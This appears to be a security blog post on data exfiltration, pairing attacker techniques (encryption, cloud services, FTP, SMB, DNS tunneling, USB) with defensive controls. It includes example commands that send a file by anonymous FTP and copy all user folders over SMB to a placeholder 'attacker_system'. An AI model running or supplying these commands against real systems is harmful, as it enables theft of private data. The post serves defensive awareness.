Exfiltrate Sensitive Data
Data exfiltration is an unauthorized copying, transferring or retrieval of data from a source. The attacker can exfiltrate the data automatically, through the use of malware, or manually, by some remote code execution exploit. It is important to recognize that the automatic methods must be incredibly robust as almost all of these methods can fail depending on the network environment. For this reason, it is likely that if the attacker is exfiltrating data automatically, he or she will use methods most likely not to fail and may even have back up methods ready in case of failure states.
Red Team: Attack vectors and Techniques
Some of the most common protocols and standards used for data exfiltration or command and control include HTTP/HTTPS, FTP/FTPS/SFTP, SSH, IRC, email, P2P, and DNS or ICMP for covert channels. For both manual and automatic exfiltration, the method chosen for exfiltration is likely to be well known and well used channel that has legitimate uses. The below are the techniques which i have seen in wild.
1.Attacker in order to make it portable & minimize, attacker compresses & encrypt the data .. So Check if there is any file compressed (7zip,rar,zip,zlib)
Tools like Network intrusion prevention, DLP helps this by blocking spec file types over unencrypted channels, so he may use encrypted channel/ other mechanisms for encapsulate traffic.
2. A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures
i) Emotet has been observed encrypting the data it collects before sending it to the C2 server,
ii) using RC4 encryption, AES ; AES+base64 encode, 3DES
iii) compress it, and XOR encrypt it
3.Any common sites like Dropbox, Google Drive and Box are permitted, especially if an organisation outsources to shared cloud services even proxying and filtering is enabled and also sites like pastebin or even GitHub offer an easy exfiltration channel. GitHub is often permitted in many technical organisations.
4. Check if organisation hosts it’s own web servers and accessible from the internet, Compromise one of those and use it as a staging point.
5. Analyze network data for uncommon data flows
i) a client sending significantly more data than it receives from a serve
ii) If in long connection sending fixed size of data packets / sending fixed size data packets at regular intervals.
6. Data exfiltration is performed with a different protocol from the main command and control protocol or channel. Protocols include FTP, SMTP, HTTP/HTTPS, DNS, SSH,SMB, P2P.
The FTP protocol involves an authentication step, followed by the transfer of the file, followed by a closing of the connection. FTP also has the ability to decide which side of the connection will act as the client or connection initiator. This provides a slight advantage over other methods in that it allows an attacker to choose which way the connection will start, allowing some flexibility to bypass certain target-side firewall restrictions.
Standard file transfer using FTP allows the port of the receiving server to be specified by the server. Therefore, it is perfectly valid for FTP to transfer the file using non-standard ports for both malicious and non-malicious purposes.
Anonymous FTP command-line example:
echo PUT C:\Path\to\file.txt | ftp -A attacker_system
SMB Transfer
SMB command-line example:
net use \\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users\* \\attacker_system\share_folder\
DNS Tunneling Vector
DNS Tunneling is the process of creating covert communications channel b/w a computer within a n/w & server outside the n/w. Attackers can use this vector for C&C, DATA EXFILTRATION OR TUNNELING.
7. Built-in tools such WMIC, BITSADMIN, CURL,wget helps to transfer data but can be detected sometimes.
8. If an attacker or malicious insider has physical access, then various options are open. Exfiltration over Physical medium [USB, MP3 Player, Bluetooth, Phone & etc].
Fsquirt #windows bluetooth transfer tool
BLUE TEAM: Detective and Preventive Controls
Monitoring egress points from the internal network is another way to improve security. The most common locations to perform exfiltration monitoring include border gateways, at-edge IDS/IPS platforms, in the DMZ/DMZ firewall zones and within internal IDS/IPS that are in-line. DLP platforms can also do network exfiltration monitoring for data types, keywords and other more advanced pattern matches.
Endpoint & Network level
Filter Network Traffic — Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network.
Network Intrusion Prevention — Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level.
Network Segmentation — Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network
O.S Configurations — Prevent the creation of new network adapters wherever possible. Exfiltration occur over diff n/w medium than the C&C Channel [Bluetooth, Radio Frequency channel]
Disable Removable media — Prevent the intruder from grabbing confidential data by not allowing USB access.
Process Level:
1. Preparation is the effective key in identifying & responding. Training end users at regular intervals and providing awareness on cyberattacks can help the organization against cyberattacks.
2. Implement incident respond procedures for handling security incidents, breaches, and cyber threats
3. Maintain Secure Configurations.
4.Train staff on the latest security threat and security tools.
